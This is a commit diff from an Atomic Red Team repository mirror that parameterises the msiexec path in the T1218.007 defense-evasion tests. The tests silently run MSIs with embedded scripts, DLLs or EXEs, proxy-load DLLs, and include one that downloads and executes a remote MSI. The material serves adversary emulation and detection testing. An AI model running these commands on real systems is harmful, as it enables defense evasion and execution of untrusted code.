security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into 1056.001

Browse Source
This commit is contained in:
Brendan Malone
2022-06-16 14:52:46 -05:00
committed by GitHub
parent 97049fe2fc add51411df
commit c27fe5e0ec
3 changed files with 84 additions and 21 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+35 -7
View File
@@ -35294,6 +35294,10 @@ defense-evasion:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
@@ -35314,7 +35318,7 @@ defense-evasion:
'
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
@@ -35330,6 +35334,10 @@ defense-evasion:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
@@ -35350,7 +35358,7 @@ defense-evasion:
'
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
@@ -35366,6 +35374,10 @@ defense-evasion:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
@@ -35386,7 +35398,7 @@ defense-evasion:
'
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
@@ -35402,6 +35414,10 @@ defense-evasion:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
@@ -35422,7 +35438,7 @@ defense-evasion:
'
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
@@ -35588,6 +35604,10 @@ defense-evasion:
description: DLL to execute that has an implemented DllRegisterServer function
type: Path
default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
dependency_executor_name: powershell
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
@@ -35600,7 +35620,7 @@ defense-evasion:
'
executor:
command: 'msiexec.exe /y "#{dll_payload}"
command: '#{msi_exe} /y "#{dll_payload}"
'
name: command_prompt
@@ -35619,6 +35639,10 @@ defense-evasion:
function
type: Path
default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
dependency_executor_name: powershell
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
@@ -35631,7 +35655,7 @@ defense-evasion:
'
executor:
command: 'msiexec.exe /z "#{dll_payload}"
command: '#{msi_exe} /z "#{dll_payload}"
'
name: command_prompt
@@ -35649,8 +35673,12 @@ defense-evasion:
description: MSI file to execute
type: String
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
executor:
command: 'msiexec.exe /q /i "#{msi_payload}"
command: '#{msi_exe} /q /i "#{msi_payload}"
'
name: command_prompt
atomics/T1218.007/T1218.007.md
+14 -7
View File
@@ -47,6 +47,7 @@ Executes an MSI containing embedded JScript code using msiexec.exe
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
@@ -54,7 +55,7 @@ Executes an MSI containing embedded JScript code using msiexec.exe
```cmd
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
```
@@ -93,6 +94,7 @@ Executes an MSI containing embedded VBScript code using msiexec.exe
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
@@ -100,7 +102,7 @@ Executes an MSI containing embedded VBScript code using msiexec.exe
```cmd
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
```
@@ -139,6 +141,7 @@ Executes an MSI containing an embedded DLL using msiexec.exe
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
@@ -146,7 +149,7 @@ Executes an MSI containing an embedded DLL using msiexec.exe
```cmd
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
```
@@ -185,6 +188,7 @@ Executes an MSI containing an embedded EXE using msiexec.exe
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
@@ -192,7 +196,7 @@ Executes an MSI containing an embedded EXE using msiexec.exe
```cmd
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
```
@@ -415,13 +419,14 @@ Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute that has an implemented DllRegisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
msiexec.exe /y "#{dll_payload}"
#{msi_exe} /y "#{dll_payload}"
```
@@ -460,13 +465,14 @@ Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: t
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute that has an implemented DllUnregisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
msiexec.exe /z "#{dll_payload}"
#{msi_exe} /z "#{dll_payload}"
```
@@ -505,13 +511,14 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi|
| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
msiexec.exe /q /i "#{msi_payload}"
#{msi_exe} /q /i "#{msi_payload}"
```
atomics/T1218.007/T1218.007.yaml
+35 -7
View File
@@ -12,6 +12,10 @@ atomic_tests:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: |
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -27,7 +31,7 @@ atomic_tests:
Write-Host "You must provide your own MSI"
executor:
command: |
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with embedded VBScript
auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
@@ -40,6 +44,10 @@ atomic_tests:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: |
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -55,7 +63,7 @@ atomic_tests:
Write-Host "You must provide your own MSI"
executor:
command: |
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded DLL
auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
@@ -68,6 +76,10 @@ atomic_tests:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: |
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -83,7 +95,7 @@ atomic_tests:
Write-Host "You must provide your own MSI"
executor:
command: |
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded EXE
auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
@@ -96,6 +108,10 @@ atomic_tests:
description: MSI file to execute
type: Path
default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
action:
description: |
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -111,7 +127,7 @@ atomic_tests:
Write-Host "You must provide your own MSI"
executor:
command: |
msiexec.exe /q /#{action} "#{msi_payload}"
#{msi_exe} /q /#{action} "#{msi_payload}"
name: command_prompt
- name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
@@ -236,6 +252,10 @@ atomic_tests:
description: DLL to execute that has an implemented DllRegisterServer function
type: Path
default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
dependency_executor_name: powershell
dependencies:
- description: |
@@ -246,7 +266,7 @@ atomic_tests:
Write-Host "You must provide your own MSI"
executor:
command: |
msiexec.exe /y "#{dll_payload}"
#{msi_exe} /y "#{dll_payload}"
name: command_prompt
- name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
@@ -259,6 +279,10 @@ atomic_tests:
description: DLL to execute that has an implemented DllUnregisterServer function
type: Path
default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
dependency_executor_name: powershell
dependencies:
- description: |
@@ -269,7 +293,7 @@ atomic_tests:
Write-Host "You must provide your own MSI"
executor:
command: |
msiexec.exe /z "#{dll_payload}"
#{msi_exe} /z "#{dll_payload}"
name: command_prompt
- name: Msiexec.exe - Execute Remote MSI file
auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
@@ -282,7 +306,11 @@ atomic_tests:
description: MSI file to execute
type: String
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
msi_exe:
description: MSIExec File Path
type: Path
default: c:\windows\system32\msiexec.exe
executor:
command: |
msiexec.exe /q /i "#{msi_payload}"
#{msi_exe} /q /i "#{msi_payload}"
name: command_prompt